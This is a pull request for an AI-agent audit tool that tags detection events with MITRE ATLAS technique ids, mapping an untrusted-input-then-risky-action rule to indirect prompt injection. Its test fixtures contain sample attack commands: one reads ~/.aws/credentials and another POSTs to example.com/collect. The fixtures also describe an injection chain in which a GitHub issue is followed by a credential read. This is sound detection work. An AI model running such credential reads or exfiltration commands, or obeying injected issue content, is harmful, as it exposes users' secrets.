### PR TITLE
feat(atlas): optional MITRE ATLAS enrichment on AI-specific detections

### DIFF
--- a/ROADMAP.md
+++ b/ROADMAP.md
@@ -87,6 +87,7 @@ item matters to you.
 | P1 | **Detection benchmark fixtures** | `tests/fixtures/` or `bench/` | CI runs rules against synthetic attack JSONL |
 | P2 | **More IDE hosts** | `scripts/` hooks | Windsurf, VS Code Copilot |
 | P2 | **Richer DLP** | DLP manifest | Source-code / PII heuristics beyond regex |
+| P1 | ~~**ATLAS enrichment on AI-specific detections**~~ | `core/audit/atlas.py` + detection manifest | ✓ Optional `atlas` block on detection events; one rule mapped (`untrusted-input-then-risky-action` → `AML.T0051.001`); ids resolved by name and pinned to ATLAS 2026.07 / format 6.0.0; schema 1.2.0; YAML override with id validation; benchmark unchanged at 0 missed / 0 false positives |
 
 ---
 

--- a/apps/orchestrator/agentmetry/core/audit/adapters/agt.py
+++ b/apps/orchestrator/agentmetry/core/audit/adapters/agt.py
@@ -221,6 +221,7 @@ def agt_to_canonical(
     """
     from agentmetry.core.audit.detection.traits import classify_command
     from agentmetry.core.audit.atlas import attach_atlas
+    from agentmetry.core.audit.canonical import SCHEMA_VERSION
     from agentmetry.core.audit.mitre import get_mitre_mapping
 
     data = entry.get("data") if isinstance(entry.get("data"), dict) else {}
@@ -254,7 +255,7 @@ def agt_to_canonical(
     agent_did = str(entry.get("agent_did") or "")
 
     return {
-        "schema_version": "1.1.0",
+        "schema_version": SCHEMA_VERSION,
         # AGT's entry_id is `audit_<16 hex>`, not a UUID, so it cannot be used
         # as an event_id directly. Derived deterministically so re-importing the
         # same file does not mint new identities for the same events.

--- a/apps/orchestrator/agentmetry/core/audit/atlas.py
+++ b/apps/orchestrator/agentmetry/core/audit/atlas.py
@@ -54,6 +54,7 @@ mapping rides in the vendor namespace as `agentmetry.tool.atlas.*`. See
 
 from __future__ import annotations
 
+import re
 from typing import Any
 
 #: The ATLAS content release these mappings were read from. Printed by the CLI
@@ -68,12 +69,20 @@ ATLAS_FRAMEWORK = "MITRE ATLAS"
 
 
 def _a(tactic_id: str, tactic: str, technique_id: str, technique: str) -> dict[str, str]:
+    """One block shape everywhere: tool calls, mcp_schema, and detections.
+
+    `atlas_version` rides on the block rather than living only in this module.
+    ATLAS renumbers between releases, so a consumer holding a two-year-old
+    trail needs to know which matrix an id was resolved against to interpret
+    it. A version recorded only in source is a version the event does not have.
+    """
     return {
         "framework": ATLAS_FRAMEWORK,
         "tactic_id": tactic_id,
         "tactic": tactic,
         "technique_id": technique_id,
         "technique": technique,
+        "atlas_version": ATLAS_VERSION,
     }
 
 
@@ -152,3 +161,114 @@ def attach_atlas(tool: Any) -> None:
     mapping = get_atlas_mapping(tool.get("mitre"))
     if mapping is not None:
         tool["atlas"] = dict(mapping)
+
+
+# ---------------------------------------------------------------------------
+# Detection-level mapping
+#
+# ATT&CK describes what a tool call did. ATLAS at THIS level describes the
+# adversary technique a whole sequence is evidence of, which is a claim only a
+# rule can make and never a single call.
+#
+# Deliberately small. Of the fifteen built-in rules, one describes an ATLAS
+# technique; the rest are host and operations behaviour that ATT&CK already
+# covers, and tagging them would put an AI-threat label on a shell command.
+# The empty entries are the design, not a backlog.
+# ---------------------------------------------------------------------------
+
+#: `AML.T0051.001`, whose canonical `name` field is the bare word "Indirect"
+#: because ATLAS names sub-techniques relative to their parent. Rendered here
+#: with the parent so the string is readable on its own in a SIEM column.
+INDIRECT_PROMPT_INJECTION = _a(
+    "AML.TA0005",
+    "Execution",
+    "AML.T0051.001",
+    "LLM Prompt Injection: Indirect",
+)
+
+#: rule_id -> ATLAS technique. Absent means the rule has no ATLAS meaning, and
+#: absent is the common case.
+DETECTION_ATLAS: dict[str, dict[str, str]] = {
+    # Content arrives from a channel the model did not control, and the agent
+    # then acts on it. That sequence is the observable signature of indirect
+    # prompt injection: ATLAS describes injection "via a separate data channel
+    # ingested by the LLM, such as text or multimedia pulled from databases or
+    # websites". The rule cannot prove intent, and neither does the label: it
+    # says which technique this is evidence of, not that an adversary exists.
+    "untrusted-input-then-risky-action": INDIRECT_PROMPT_INJECTION,
+}
+
+#: ATLAS id grammar, for validating analyst-supplied overrides. Four digits,
+#: optional three-digit sub-technique.
+TECHNIQUE_ID_RE = re.compile(r"^AML\.T\d{4}(\.\d{3})?$")
+TACTIC_ID_RE = re.compile(r"^AML\.TA\d{4}$")
+
+#: Mappings declared in the YAML manifest, layered over the table above so an
+#: analyst can map their own rule without editing Python. Populated at rule
+#: build time; cleared whenever the YAML rules are rebuilt.
+_yaml_atlas: dict[str, dict[str, str]] = {}
+
+
+class AtlasMappingError(ValueError):
+    """A YAML rule declared an `atlas` block that is not usable."""
+
+
+def parse_yaml_atlas(rule_id: str, spec: Any) -> dict[str, str] | None:
+    """Validate an analyst-supplied `atlas:` block from the rule manifest.
+
+    Raises rather than dropping the block. A mapping silently discarded because
+    of a typo is worse than one that fails loudly: the rule keeps firing, the
+    analyst believes it is tagged, and nothing says otherwise until somebody
+    queries for a technique id that was never emitted.
+    """
+    if spec is None:
+        return None
+    if not isinstance(spec, dict):
+        raise AtlasMappingError(f"{rule_id}: atlas must be a mapping, got {type(spec).__name__}")
+
+    technique_id = str(spec.get("technique_id") or "").strip()
+    if not TECHNIQUE_ID_RE.match(technique_id):
+        raise AtlasMappingError(
+            f"{rule_id}: atlas.technique_id {technique_id!r} is not an ATLAS id "
+            "(expected AML.TXXXX or AML.TXXXX.YYY)"
+        )
+    tactic_id = str(spec.get("tactic_id") or "").strip()
+    if tactic_id and not TACTIC_ID_RE.match(tactic_id):
+        raise AtlasMappingError(
+            f"{rule_id}: atlas.tactic_id {tactic_id!r} is not an ATLAS tactic id "
+            "(expected AML.TAXXXX)"
+        )
+
+    return {
+        "framework": ATLAS_FRAMEWORK,
+        "tactic_id": tactic_id,
+        "tactic": str(spec.get("tactic") or "").strip(),
+        "technique_id": technique_id,
+        "technique": str(spec.get("technique") or "").strip(),
+        # The analyst's own pin. They resolved the id against some release, and
+        # claiming ours would attribute their mapping to a matrix they may not
+        # have read.
+        "atlas_version": str(spec.get("atlas_version") or ATLAS_VERSION).strip(),
+    }
+
+
+def reset_yaml_atlas() -> None:
+    _yaml_atlas.clear()
+
+
+def register_yaml_atlas(rule_id: str, mapping: dict[str, str] | None) -> None:
+    if mapping is not None:
+        _yaml_atlas[rule_id] = mapping
+
+
+def atlas_for_rule(rule_id: str) -> dict[str, str] | None:
+    """The ATLAS block for a firing rule, or None.
+
+    YAML wins over the built-in table: an operator editing their own manifest
+    is making a deliberate statement about their environment, and a shipped
+    default that silently overrode it would make the override feature a lie.
+    """
+    if not rule_id:
+        return None
+    found = _yaml_atlas.get(rule_id) or DETECTION_ATLAS.get(rule_id)
+    return dict(found) if found is not None else None

--- a/apps/orchestrator/agentmetry/core/audit/canonical.py
+++ b/apps/orchestrator/agentmetry/core/audit/canonical.py
@@ -23,7 +23,15 @@ from agentmetry.core.bus.events import (
     TOOL_CALLED,
     TOOL_DENIED,
 )
-SCHEMA_VERSION = "1.1.0"
+#: Canonical event schema version.
+#:
+#: 1.2.0 adds an optional `atlas` block on detection events. Additive only: no
+#: field moved, no field changed meaning, and nothing became required. A 1.1.0
+#: consumer parses a 1.2.0 event and sees a key it does not recognise, which is
+#: the case its JSON parser already handles. Anything that pins an exact string
+#: rather than a lower bound will need updating, which is why this is a minor
+#: bump and not a patch.
+SCHEMA_VERSION = "1.2.0"
 
 _TOPIC_ACTION: dict[str, tuple[str, str]] = {
     RUN_STARTED: ("session_start", "success"),

--- a/apps/orchestrator/agentmetry/core/audit/detection/disposition.py
+++ b/apps/orchestrator/agentmetry/core/audit/detection/disposition.py
@@ -35,6 +35,7 @@ from datetime import datetime, timezone
 from pathlib import Path
 from typing import Any
 
+from agentmetry.core.audit.canonical import SCHEMA_VERSION
 from agentmetry.core.audit.identity import identity_fields
 
 logger = logging.getLogger(__name__)
@@ -392,7 +393,7 @@ def build_disposition_event(
     from agentmetry.core.config import settings
 
     return {
-        "schema_version": "1.1.0",
+        "schema_version": SCHEMA_VERSION,
         "event_id": str(uuid.uuid4()),
         "correlation_id": correlation_id,
         "session_id": "",

--- a/apps/orchestrator/agentmetry/core/audit/detection/live.py
+++ b/apps/orchestrator/agentmetry/core/audit/detection/live.py
@@ -22,6 +22,7 @@ from __future__ import annotations
 import uuid
 from typing import Any
 
+from agentmetry.core.audit.canonical import SCHEMA_VERSION
 from agentmetry.core.audit.identity import identity_fields
 
 from .engine import run_detections, run_host_detections
@@ -107,7 +108,7 @@ def build_detection_event(detection: Detection, source_event: dict[str, Any]) ->
     source = source_event.get("source")
     agent = source_event.get("agent")
     return {
-        "schema_version": source_event.get("schema_version", "1.1.0"),
+        "schema_version": source_event.get("schema_version", SCHEMA_VERSION),
         "event_id": str(uuid.uuid4()),
         "session_id": source_event.get("session_id", ""),
         "correlation_id": detection.correlation_id or source_event.get("correlation_id", ""),

--- a/apps/orchestrator/agentmetry/core/audit/detection/live.py
+++ b/apps/orchestrator/agentmetry/core/audit/detection/live.py
@@ -22,6 +22,7 @@ from __future__ import annotations
 import uuid
 from typing import Any
 
+from agentmetry.core.audit.atlas import atlas_for_rule
 from agentmetry.core.audit.canonical import SCHEMA_VERSION
 from agentmetry.core.audit.identity import identity_fields
 
@@ -107,6 +108,19 @@ def build_detection_event(detection: Detection, source_event: dict[str, Any]) ->
     """
     source = source_event.get("source")
     agent = source_event.get("agent")
+
+    # The ATLAS block sits inside `detection`, beside the finding it describes,
+    # matching `tool.atlas` and `mcp_schema.atlas`. One placement rule across
+    # the schema: the label lives next to the thing it labels.
+    #
+    # Omitted entirely when the rule has no mapping, rather than emitted as
+    # null. A null would force every consumer to distinguish "no ATLAS meaning"
+    # from "not yet classified", and those are the same thing here.
+    detection_block = detection.as_dict()
+    atlas = atlas_for_rule(detection.rule_id)
+    if atlas is not None:
+        detection_block["atlas"] = atlas
+
     return {
         "schema_version": source_event.get("schema_version", SCHEMA_VERSION),
         "event_id": str(uuid.uuid4()),
@@ -124,5 +138,5 @@ def build_detection_event(detection: Detection, source_event: dict[str, Any]) ->
             "reason": detection.summary,
         },
         "agent": agent if isinstance(agent, dict) else {"name": "agentmetry"},
-        "detection": detection.as_dict(),
+        "detection": detection_block,
     }

--- a/apps/orchestrator/agentmetry/core/audit/detection/yaml_rules.py
+++ b/apps/orchestrator/agentmetry/core/audit/detection/yaml_rules.py
@@ -4,6 +4,11 @@ from __future__ import annotations
 
 from typing import Any, Callable
 
+from agentmetry.core.audit.atlas import (
+    parse_yaml_atlas,
+    register_yaml_atlas,
+    reset_yaml_atlas,
+)
 from .models import Detection
 from .rules import (
     _action,
@@ -54,6 +59,11 @@ def _make_count_rule(spec: dict[str, Any]) -> Callable[[list[dict[str, Any]]], l
     match = spec.get("match") if isinstance(spec.get("match"), dict) else {}
     tactic_ids = [str(t) for t in (spec.get("tactic_ids") or []) if t]
     technique_ids = [str(t) for t in (spec.get("technique_ids") or []) if t]
+    # An analyst mapping their own rule to an ATLAS technique without editing
+    # Python. Validated and registered at build time rather than at fire time,
+    # so a typo surfaces when the manifest loads instead of silently producing
+    # untagged detections in the middle of an incident.
+    register_yaml_atlas(rule_id, parse_yaml_atlas(rule_id, spec.get("atlas")))
 
     def rule(events: list[dict[str, Any]]) -> list[Detection]:
         hits = [e for e in events if _event_matches(e, match)]
@@ -80,4 +90,8 @@ def _make_count_rule(spec: dict[str, Any]) -> Callable[[list[dict[str, Any]]], l
 
 
 def build_yaml_rules() -> list[Callable[[list[dict[str, Any]]], list[Detection]]]:
+    # Cleared first: the overlay is rebuilt from the manifest every time, so a
+    # mapping deleted from YAML actually disappears instead of surviving in
+    # memory until the process restarts.
+    reset_yaml_atlas()
     return [_make_count_rule(spec) for spec in count_rules() if spec.get("id")]

--- a/apps/orchestrator/agentmetry/core/audit/heartbeat.py
+++ b/apps/orchestrator/agentmetry/core/audit/heartbeat.py
@@ -59,6 +59,7 @@ import uuid
 from pathlib import Path
 from typing import Any
 
+from agentmetry.core.audit.canonical import SCHEMA_VERSION
 from agentmetry.core.audit.identity import identity_fields
 
 logger = logging.getLogger(__name__)
@@ -241,7 +242,7 @@ def build_heartbeat_event(now_utc: str, root: tuple[str, int] | None = None) -> 
         reason += f" (unverifiable: {', '.join(facts['hooks_unverified'])})"
 
     return {
-        "schema_version": "1.1.0",
+        "schema_version": SCHEMA_VERSION,
         "event_id": str(uuid.uuid4()),
         "session_id": "",
         "correlation_id": "",

--- a/apps/orchestrator/tests/test_agentmetry_audit.py
+++ b/apps/orchestrator/tests/test_agentmetry_audit.py
@@ -50,7 +50,9 @@ def test_normalize_tool_called():
     out = normalize_outbox_row(row)
     assert out is not None
     assert out["schema_version"] == SCHEMA_VERSION
-    assert out["schema_version"] == "1.1.0"
+    # One deliberate literal in the suite, so an accidental bump is caught by
+    # something other than the constant agreeing with itself.
+    assert out["schema_version"] == "1.2.0"
     assert out["correlation_id"] == "thread-abc"
     assert out["initiator"]["actor_type"] == "human"
     assert out["actor"]["type"] == "user"

--- a/apps/orchestrator/tests/test_atlas_detection_enrichment.py
+++ b/apps/orchestrator/tests/test_atlas_detection_enrichment.py
@@ -1,0 +1,332 @@
+"""ATLAS on detections: the technique a whole sequence is evidence of.
+
+ATT&CK describes what one tool call did. ATLAS at the detection level describes
+the adversary technique the sequence is evidence of, which is a claim only a
+rule is in a position to make.
+
+The mapping is deliberately one rule wide. Of the fifteen built-in rules, one
+describes an ATLAS technique; the rest are host and operations behaviour that
+ATT&CK already covers, and labelling those would put an AI-threat technique on
+a shell command. Most of this file exists to hold that line, because the
+pressure on a taxonomy field is always to fill it in.
+
+Ids resolved by name against ATLAS content release 2026.07, format-version
+6.0.0, at dist/v6/ATLAS-2026.07.yaml. Resolving by name rather than by
+recollection is what caught that AML.T0054 is LLM Jailbreak and not indirect
+prompt injection, and that AML.T0099 is AI Agent Tool *Data* Poisoning rather
+than AI Agent Tool Poisoning (AML.T0110).
+"""
+
+from __future__ import annotations
+
+import pytest
+
+from agentmetry.core.audit.atlas import (
+    ATLAS_VERSION,
+    AtlasMappingError,
+    DETECTION_ATLAS,
+    TECHNIQUE_ID_RE,
+    atlas_for_rule,
+    parse_yaml_atlas,
+    register_yaml_atlas,
+    reset_yaml_atlas,
+)
+from agentmetry.core.audit.canonical import SCHEMA_VERSION
+from agentmetry.core.audit.detection.engine import run_detections
+from agentmetry.core.audit.detection.live import build_detection_event
+from agentmetry.core.audit.detection.models import Detection
+
+
+@pytest.fixture(autouse=True)
+def _clean_overlay():
+    reset_yaml_atlas()
+    yield
+    reset_yaml_atlas()
+
+
+def _event(seq: int, qualified: str, command: str, mitre: dict | None = None) -> dict:
+    event: dict = {
+        "schema_version": SCHEMA_VERSION,
+        "event_id": f"e{seq}",
+        "seq": seq,
+        "correlation_id": "adi-1",
+        "timestamp_utc": f"2026-08-21T09:0{seq}:00+00:00",
+        "action": {"type": "tool_called", "outcome": "success"},
+        "tool": {"qualified": qualified, "command": command},
+    }
+    if mitre:
+        event["tool"]["mitre"] = mitre
+    return event
+
+
+def _adi_session() -> list[dict]:
+    """The chain from arXiv:2607.05120, which the rule's docstring cites.
+
+    Attacker-authorable content is pulled in (a GitHub issue), and the session
+    then performs an already-risky action. Plain execution after ingestion is
+    deliberately not enough, so the second call carries a credential-access
+    mapping.
+    """
+    return [
+        _event(1, "Bash", "gh issue view 42 --repo acme/widget"),
+        _event(
+            2,
+            "Bash",
+            "cat ~/.aws/credentials",
+            {
+                "tactic_id": "TA0006",
+                "tactic": "Credential Access",
+                "technique_id": "T1552.001",
+                "technique": "Credentials In Files",
+            },
+        ),
+    ]
+
+
+def _fire(events: list[dict], rule_id: str) -> Detection:
+    hits = [d for d in run_detections(events) if d.rule_id == rule_id]
+    assert hits, f"expected {rule_id} to fire; got {[d.rule_id for d in run_detections(events)]}"
+    return hits[0]
+
+
+# ---------------------------------------------------------------------------
+# The mapped rule
+# ---------------------------------------------------------------------------
+
+
+def test_the_adi_chain_fires_and_carries_indirect_prompt_injection():
+    detection = _fire(_adi_session(), "untrusted-input-then-risky-action")
+    event = build_detection_event(detection, _adi_session()[0])
+
+    atlas = event["detection"]["atlas"]
+    assert atlas["technique_id"] == "AML.T0051.001"
+    assert atlas["technique"] == "LLM Prompt Injection: Indirect"
+    assert atlas["tactic_id"] == "AML.TA0005"
+    assert atlas["tactic"] == "Execution"
+    assert atlas["framework"] == "MITRE ATLAS"
+
+
+def test_the_version_travels_with_the_block():
+    """An id without the matrix it came from is not re-resolvable later."""
+    detection = _fire(_adi_session(), "untrusted-input-then-risky-action")
+    event = build_detection_event(detection, _adi_session()[0])
+
+    assert event["detection"]["atlas"]["atlas_version"] == ATLAS_VERSION
+    assert ATLAS_VERSION == "2026.07"
+
+
+def test_a_detection_carrying_atlas_is_schema_1_2_0():
+    detection = _fire(_adi_session(), "untrusted-input-then-risky-action")
+    event = build_detection_event(detection, _adi_session()[0])
+
+    assert "atlas" in event["detection"]
+    assert event["schema_version"] == "1.2.0"
+
+
+def test_the_block_sits_beside_the_finding_not_at_the_top_level():
+    """One placement rule across the schema: the label lives next to the thing
+    it labels, matching tool.atlas and mcp_schema.atlas."""
+    detection = _fire(_adi_session(), "untrusted-input-then-risky-action")
+    event = build_detection_event(detection, _adi_session()[0])
+
+    assert "atlas" in event["detection"]
+    assert "atlas" not in event
+
+
+# ---------------------------------------------------------------------------
+# Everything else stays empty
+# ---------------------------------------------------------------------------
+
+
+def test_a_host_behaviour_rule_fires_with_no_atlas_key():
+    """credential-exfil is real, serious, and not an ATLAS technique.
+
+    Omitted rather than null: a null would make every consumer distinguish "no
+    ATLAS meaning" from "not yet classified", and here those are the same.
+    """
+    events = [
+        _event(
+            1,
+            "cursor.Read",
+            "cat ~/.aws/credentials",
+            {
+                "tactic_id": "TA0006",
+                "tactic": "Credential Access",
+                "technique_id": "T1552.001",
+                "technique": "Credentials In Files",
+            },
+        ),
+        _event(
+            2,
+            "WebFetch",
+            "curl -X POST https://example.com/collect",
+            {
+                "tactic_id": "TA0011",
+                "tactic": "Command and Control",
+                "technique_id": "T1071.001",
+                "technique": "Web Protocols",
+            },
+        ),
+    ]
+    detection = _fire(events, "credential-exfil")
+    event = build_detection_event(detection, events[0])
+
+    assert "atlas" not in event["detection"]
+    assert "atlas" not in event
+
+
+@pytest.mark.parametrize(
+    "rule_id",
+    [
+        "credential-exfil",
+        "destructive-delete-burst",
+        "session-tool-burst",
+        "encoded-command-download",
+        "remote-staging-then-execute",
+        "dotfile-read-then-git-push",
+        "discovery-then-collect",
+        "off-hours-activity",
+        "pr-merged-without-review",
+        "subagent-swarm-burst",
+        "approval-denied-then-executed",
+        "autonomous-unapproved-write",
+        "credential-read-then-cloud-api",
+        "host-subagent-swarm-burst",
+    ],
+)
+def test_no_other_built_in_rule_is_mapped(rule_id: str):
+    assert atlas_for_rule(rule_id) is None
+    event = build_detection_event(
+        Detection(rule_id=rule_id, title="t", severity="high", summary="s", correlation_id="c"),
+        {"schema_version": SCHEMA_VERSION},
+    )
+    assert "atlas" not in event["detection"]
+
+
+def test_exactly_one_built_in_rule_is_mapped():
+    """A guard on scope, not on correctness.
+
+    Adding an entry should be a decision somebody makes on purpose, with an id
+    resolved against the pinned release. If this number moves, the mapping
+    grew, and this test is where that gets noticed.
+    """
+    assert set(DETECTION_ATLAS) == {"untrusted-input-then-risky-action"}
+
+
+def test_an_unknown_rule_id_is_not_mapped():
+    assert atlas_for_rule("some-rule-that-does-not-exist") is None
+    assert atlas_for_rule("") is None
+
+
+# ---------------------------------------------------------------------------
+# Analyst overrides from the YAML manifest
+# ---------------------------------------------------------------------------
+
+
+def test_an_analyst_can_map_their_own_rule_without_editing_python():
+    register_yaml_atlas(
+        "rapid-dlp-blocks",
+        parse_yaml_atlas(
+            "rapid-dlp-blocks",
+            {
+                "tactic_id": "AML.TA0010",
+                "tactic": "Exfiltration",
+                "technique_id": "AML.T0086",
+                "technique": "Exfiltration via AI Agent Tool Invocation",
+            },
+        ),
+    )
+    mapping = atlas_for_rule("rapid-dlp-blocks")
+    assert mapping["technique_id"] == "AML.T0086"
+    assert mapping["atlas_version"] == ATLAS_VERSION
+
+
+def test_a_yaml_mapping_wins_over_the_built_in_one():
+    """An operator editing their own manifest is making a deliberate statement.
+
+    A shipped default that silently overrode it would make the override feature
+    a lie.
+    """
+    register_yaml_atlas(
+        "untrusted-input-then-risky-action",
+        parse_yaml_atlas(
+            "untrusted-input-then-risky-action",
+            {"technique_id": "AML.T0051", "technique": "LLM Prompt Injection"},
+        ),
+    )
+    assert atlas_for_rule("untrusted-input-then-risky-action")["technique_id"] == "AML.T0051"
+
+
+def test_an_analyst_can_pin_their_own_atlas_release():
+    mapping = parse_yaml_atlas(
+        "r", {"technique_id": "AML.T0051", "atlas_version": "2025.11"}
+    )
+    assert mapping["atlas_version"] == "2025.11"
+
+
+@pytest.mark.parametrize(
+    "bad",
+    [
+        "T1552.001",  # ATT&CK, not ATLAS
+        "AML.T51",  # too few digits
+        "AML.T00511",  # too many
+        "AML.TA0005",  # a tactic id in the technique field
+        "aml.t0051",  # case matters
+        "AML.T0051.1",  # sub-technique must be three digits
+        "",
+    ],
+)
+def test_a_malformed_technique_id_is_rejected_loudly(bad: str):
+    """Raising beats dropping.
+
+    A mapping silently discarded for a typo leaves the rule firing, the analyst
+    believing it is tagged, and nothing saying otherwise until somebody queries
+    for a technique id that was never emitted.
+    """
+    with pytest.raises(AtlasMappingError):
+        parse_yaml_atlas("some-rule", {"technique_id": bad})
+
+
+def test_a_malformed_tactic_id_is_rejected():
+    with pytest.raises(AtlasMappingError):
+        parse_yaml_atlas("r", {"technique_id": "AML.T0051", "tactic_id": "TA0005"})
+
+
+def test_a_non_mapping_atlas_block_is_rejected():
+    with pytest.raises(AtlasMappingError):
+        parse_yaml_atlas("r", ["AML.T0051"])
+
+
+def test_no_atlas_key_in_yaml_is_simply_no_mapping():
+    assert parse_yaml_atlas("r", None) is None
+
+
+def test_the_id_grammar_accepts_techniques_and_subtechniques():
+    assert TECHNIQUE_ID_RE.match("AML.T0051")
+    assert TECHNIQUE_ID_RE.match("AML.T0051.001")
+
+
+# ---------------------------------------------------------------------------
+# Backward compatibility
+# ---------------------------------------------------------------------------
+
+
+def test_a_1_1_0_source_event_still_produces_a_usable_detection():
+    """The bump is additive, so an older event flowing in is not an error.
+
+    The detection inherits the source event's version, which is the existing
+    behaviour and is left alone: a 1.1.0 event that produced a finding did not
+    retroactively become a 1.2.0 event.
+    """
+    events = _adi_session()
+    for event in events:
+        event["schema_version"] = "1.1.0"
+    detection = _fire(events, "untrusted-input-then-risky-action")
+    built = build_detection_event(detection, events[0])
+
+    assert built["schema_version"] == "1.1.0"
+    # The block is still attached: enrichment does not depend on the bump.
+    assert built["detection"]["atlas"]["technique_id"] == "AML.T0051.001"
+    # Every field a 1.1.0 consumer reads is still where it was.
+    for key in ("event_id", "correlation_id", "timestamp_utc", "action", "detection"):
+        assert key in built

--- a/apps/orchestrator/tests/test_external_ingest.py
+++ b/apps/orchestrator/tests/test_external_ingest.py
@@ -8,6 +8,7 @@ from pathlib import Path
 import pytest
 from fastapi.testclient import TestClient
 
+from agentmetry.core.audit.canonical import SCHEMA_VERSION
 from agentmetry.core.audit.external import build_external_canonical
 from agentmetry.core.audit.ingest import (
     ingest_external_event,
@@ -29,7 +30,7 @@ def test_build_external_canonical_cursor_tool():
             "arguments": {"command": "pytest -q"},
         },
     })
-    assert out["schema_version"] == "1.1.0"
+    assert out["schema_version"] == SCHEMA_VERSION
     assert out["source"]["app"] == "cursor"
     assert out["source"]["tier"] == "external"
     assert out["agent"]["name"] == "cursor"

--- a/docs/agentmetry-event-schema.md
+++ b/docs/agentmetry-event-schema.md
@@ -1,4 +1,4 @@
-# Agentmetry event schema (v1.1.0)
+# Agentmetry event schema (v1.2.0)
 
 Canonical JSON events for IDE hook capture and MCP audit. The orchestrator writes these to:
 
@@ -78,6 +78,152 @@ Agentmetry's rule vocabulary.
 `initiator.actor_type` is set at `run_skill` from the call site (`manual`, `cron`, `vault_watch`, `ingress`, …) — never from client headers. `approval_response` events keep the run's `initiator` but set `actor.type=user` (the operator who clicked approve/reject).
 
 **Note on DLP**: When an execution is blocked by the local Regex/YARA scanner, `action.outcome` is set to `denied` and `action.reason` is set to `dlp:<rule_id>`. The specific match data is logged in the `dlp` block.
+
+### v1.2 additions (additive)
+
+| Field | When present | Purpose |
+|-------|--------------|---------|
+| `detection.atlas` | `action.type: detection`, and only for rules that describe an AI-specific technique | `{framework, tactic_id, tactic, technique_id, technique, atlas_version}` |
+| `tool.atlas` | `tool_called` where ATLAS says something ATT&CK cannot | Same shape |
+| `mcp_schema.atlas` | `action.type: mcp_schema` with `status: changed` | Same shape |
+
+A 1.1.0 consumer parses a 1.2.0 event and meets one key it does not recognise,
+which its JSON parser already handles. Nothing moved, nothing changed meaning,
+nothing became required. Consumers pinning the exact string rather than a lower
+bound are the only ones that need a change.
+
+## MITRE ATLAS (`atlas`)
+
+ATT&CK describes what the agent did to the host. ATLAS describes what was done
+to or through the agent. Both blocks can appear on one event, describing
+different things about it.
+
+`cursor.Read` on `~/.aws/credentials` is `T1552.001` whether a human, a script
+or an agent did it. An MCP server changing its advertised tool schema between
+calls has no honest ATT&CK id at all. That gap is why this block exists.
+
+```json
+"atlas": {
+  "framework": "MITRE ATLAS",
+  "tactic_id": "AML.TA0005",
+  "tactic": "Execution",
+  "technique_id": "AML.T0051.001",
+  "technique": "LLM Prompt Injection: Indirect",
+  "atlas_version": "2026.07"
+}
+```
+
+`atlas_version` is the ATLAS content release the id was resolved against.
+ATLAS renumbers between releases, so an id in an old trail is not
+re-resolvable without it. Query on `technique_id`; `technique` is a display
+label and its wording can change, exactly as with ATT&CK.
+
+### Where the block appears, and where it does not
+
+The block sits beside the thing it labels: inside `detection`, inside `tool`,
+inside `mcp_schema`. It is never at the top level.
+
+It is **absent on most events**, and that is the design rather than a gap.
+A field carrying the same value everywhere is decoration, not signal. Two
+techniques are deliberately never emitted for that reason:
+
+- `AML.T0053 AI Agent Tool Invocation` is true of every event this product
+  records, by definition.
+- `AML.T0050 Command and Scripting Interpreter` is ATLAS restating `T1059`
+  with no agent-specific claim attached.
+
+Exactly one built-in detection rule is mapped:
+
+| Rule | ATLAS | Why |
+|------|-------|-----|
+| `untrusted-input-then-risky-action` | `AML.T0051.001` LLM Prompt Injection: Indirect | Attacker-authorable content enters the session, then an already-risky action follows. ATLAS describes indirect injection as arriving "via a separate data channel ingested by the LLM". |
+
+Rules such as `credential-exfil` and `destructive-delete-burst` carry no ATLAS
+block. They are real and serious and they are host behaviour, which ATT&CK
+already covers.
+
+### Analyst overrides
+
+A YAML rule in `agentmetry/policies/detection/manifest.yaml` may declare its
+own mapping, which wins over any built-in one:
+
+```yaml
+- id: my-custom-rule
+  atlas:
+    tactic_id: AML.TA0010
+    tactic: Exfiltration
+    technique_id: AML.T0086
+    technique: Exfiltration via AI Agent Tool Invocation
+    atlas_version: "2026.07"   # optional; defaults to the shipped pin
+```
+
+`technique_id` is validated against `^AML\.T\d{4}(\.\d{3})?$` and
+`tactic_id` against `^AML\.TA\d{4}$` when the manifest loads. A malformed id
+raises rather than being dropped: a mapping silently discarded for a typo
+leaves the rule firing while the analyst believes it is tagged.
+
+### Query patterns
+
+Splunk:
+
+```
+index=main sourcetype=agentmetry:json event.detection.atlas.technique_id="AML.T0051.001"
+```
+
+Elastic. Note the vendor path: ATLAS ids never enter ECS `threat.*`, because
+those fields are ATT&CK-typed and an `AML.T****` there would corrupt any
+rollup that groups by technique without filtering on `threat.framework`.
+
+```
+FROM logs-agentmetry
+| WHERE agentmetry.detection.atlas.technique_id IS NOT NULL
+| KEEP @timestamp, host.name, agentmetry.detection.rule_id, agentmetry.detection.atlas.technique_id
+```
+
+Every ATLAS-labelled finding, whatever the technique:
+
+```
+FROM logs-agentmetry
+| WHERE agentmetry.detection.atlas.framework == "MITRE ATLAS"
+```
+
+### Out of scope
+
+Two ATLAS tactics are not covered and are not planned here, because they need
+signals from inside the model that an endpoint sensor at the tool boundary
+does not have:
+
+| Tactic | Why not |
+|--------|---------|
+| `AML.TA0000` AI Model Access | Requires observing queries to and responses from the model itself. Agentmetry records the tool lifecycle, not inference. |
+| `AML.TA0001` AI Attack Staging | Proxy training, adversarial-example crafting and model replication happen off this host, before anything reaches a tool boundary. |
+
+Both were renamed from "ML" to "AI" in current ATLAS, and both are commonly
+cited under the wrong ids: `AML.TA0004` is Initial Access and `AML.TA0012` is
+Privilege Escalation.
+
+The Cloud Security Alliance's *MITRE ATT&CK and ATLAS Agentic Gap Analysis*
+(2026-03-27) argues that ATLAS itself has agentic gaps overlapping the surface
+a tool-boundary sensor sees. That cuts both ways: some agent behaviour this
+product records has no ATLAS technique either, which is why the block is
+absent far more often than it is present.
+
+### Re-resolving the ids
+
+Every id here was resolved **by name** against the canonical source, not from
+memory or from secondary write-ups:
+
+```
+git clone https://github.com/mitre-atlas/atlas-data
+# dist/ATLAS-latest.yaml is a symlink; dist/ATLAS.yaml is a deprecated 5.6.0 snapshot
+cat dist/v6/ATLAS-2026.07.yaml
+```
+
+Pinned release: **2026.07**, format-version **6.0.0**. Resolving by name is
+what catches renumbering. Two examples that a from-memory mapping gets wrong:
+`AML.T0054` is *LLM Jailbreak*, not indirect prompt injection; and
+`AML.T0099` is *AI Agent Tool Data Poisoning*, a different technique from
+*AI Agent Tool Poisoning*, which is `AML.T0110`.
 
 ## Example (`run/tool_called`)
 


### PR DESCRIPTION
Optional ATLAS enrichment at the **detection** level. ATT&CK remains the primary taxonomy. No parallel detection engine, no new rules, no matching logic touched.

Four commits, one per logical step.

